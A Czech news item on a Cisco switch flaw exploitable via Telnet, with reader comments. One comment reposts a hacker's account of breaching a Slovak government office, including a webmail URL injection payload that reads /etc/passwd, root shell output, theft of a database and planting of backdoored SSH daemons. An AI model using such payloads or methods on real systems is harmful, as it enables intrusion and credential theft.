Switche Cisco lze unést přes Telnet

20. 3. 2017

Závažná chyba v Cisco Cluster Management Protocol, který používají switche společnosti Cisco, umožňuje unesení zařízení. Útočník zařízení může restartovat a spustit škodlivý kód, kterým získá práva administrátora. Na chybu výzkumníci narazili tehdy, když hledali možné chyby zneužívané CIA v rámci projektu Vault 7. Není však zřejmé, zda o této konkrétní chybě CIA věděla.

Oprava zatím není k dispozici, ale stejně tak ani funkční exploit. Nejlepším řešením je aktuálně vypnout zastaralý protokol Telnet, jedině přes ten lze útok provést. Cisco Cluster Management Protocol spolupracuje také s SSH, který zranitelný není. Viz kompletní seznam zranitelných routerů.

(Zdroj: The Hacker News)

Našli jste v článku chybu?

Zasílat nově přidané názory e-mailem

Aktualita je stará, nové názory již nelze přidávat.

20. 3. 2017 13:18

Petr (neregistrovaný)

Switche Cisco mají ve výchozím stavu povolený telnet? Nebo si ho povolují admini? Celkem střelci, ať už jedni nebo druzí.
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 14:10

lojzak (neregistrovaný)

Telnet není ve výchozím nastavení povolen.
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 14:18

Kate

Stříbrný podporovatel

S Ciscama jsem se učila na škole 14 let zpátky a už tehdy bylo nutné telnet explicitně zapnout… Takže nevím nevím jak je taková chyba zneužitelná…
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 16:42

Peter Fodrek

Zlatý podporovatel

Preco. Oni len chcu "free time adminov", tak ako v NeBezpecnostnom Urade SR (oficialne Narodnom Bezpecnostnom Urade SR)

vsetko sa zacalo pri vtipkoch medzi kamaratmi, ktori si vsimli chybu v mailovom rozhrani na adrese webmail.nbusr.sk, pomocou ktorej bolo mozne vykonavat systemove prikazy na serveri. (ja viem, tato veta znie uplne napicu, ale tak nech chapu aj ludia menej zasveteni danej problematike ;))
tym padom bolo mozne prevziat zoznam lokalnych userov na masine.

http://webmail.nbusr.sk/horde/services/help/
?show=about&module=;%22.passthru(%22cat%20%22.
chr(47).%22etc%22.chr(47).%22passwd%22);%27.

do oci bil najma uzivatel s loginom nbusr
nuz...
kruty vtip - pouzit heslo nbusr123 - nam takmer roztrhol branice - heslo fungovalo (na prvy pokus). ukazalo sa motd a boli sme prihlaseni na masine

po chvilke skumania a behania po stroji sme skusili su na roota utok na branice cislo 2 :)

%su
www.nbusr.sk# id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
www.nbusr.sk# uname -a
FreeBSD www.nbusr.sk 6.0-RELEASE FreeBSD 6.0-RELEASE #0:Thu Nov 3 UTC 2005 root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386
www.nbusr.sk#

nbusr@archive> su
Password:
nbusr@archive# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
nbusr@archive# uname -a
FreeBSD archive.nbusr.sk 4.10-STABLE FreeBSD 4.10-STABLE #1: Mon Feb 14 14:47:10
CET 2005 root@archive.nbusr.sk:/usr/src/sys/compile/ARCHIVE i386
nbusr@archive#

dalsi zachvat branice..

z archivu sme si odniesli cca 18 gb databazu taktiez zaujimavou masinou bolo ep.nbusr.sk ;)

po ziskani tohoto hesla sa nam otvorila v podstate cela siet, kedze heslo fungovalo na vsetky ostatne zariadenia unixoveho (servre) alebo sietoveho charakteru (cisco routre/switche). vecer sa nasadili na masiny zabackdoorovane ssh demony, ktore nam zaznamenavali pohyb adminov po dalsich strojoch (aj s heslami of course :) )
http://linuxos.sk/blackhole/clanok/442/
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 17:33

lojzak (neregistrovaný)

11 let stará záležitost...
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 8:50

NN (neregistrovaný)

Not this shit again, pls.
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 18:16

j (neregistrovaný)

Cisco nema v defaultu zapnuty ani sshcko ... musis se nejdriv pripojit na seriak, a zakladni konfiguraci udelat pres nej. Ale pocitam ze ten port uz brzo zacne mizet, takze ...
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
20. 3. 2017 19:14

lojzak (neregistrovaný)

Ze switchů řady SMB zmizel seriový port už dávno a pokud vím, tak tyto switche ani nenabízí možnost připojit se na TTY přes Telnet nebo SSH.

Obecně je problém mít SSH v defaultu (tj aby mi šlo na switchi, který jsem vytáhl z krabice a poprvé zapojil do elektriky). Jakým způsobem se budou generovat klíče? Jak to bude po restartu do tování konfigurace?
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 7:00

Petr M (neregistrovaný)

Ale ono stačí USB2.0 device pro administraci, ne? Procáky to vesměs podporují a když ne, tak UART a FT232 v tom množství nestojí tolik. A na lokále odříznutým od sítě by Telnet neměl být problém... Klidně je to realizovatelný za cenu konektoru i na strojích pro BFU.
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 10:34

NN (neregistrovaný)

Nikde, ani v popisu CVE, ani v popisu Cisco Security Advisory se o zadnem "unosu" nepise. Mohl by to autor clanku vysvetlit? Nebo alespon opravit zavadejici nadpis?
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 10:44

Jindřich Šaur

Já unesu i tři Cisco switche najednou. I bez telnetu. Stačí mi na to ruce... :-)
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 14:33

Jarda_P

Unest je neni problem, ale jeste to chce najit kupce a to vse tak, aby te policajti nechytili.
- Zobrazit celé vlákno
- Skok na další nový názor. K navigaci lze použít i klávesy N pro následující a P pro předchozí nový názor
21. 3. 2017 15:57

Jindřich Šaur

Já je většinou PŘINESU :-) Když je ODNESU tak zase do jiné serverovny. Ale zatím je pořád UNESU. Až budu starší, bude to horší :-)
- Zobrazit celé vlákno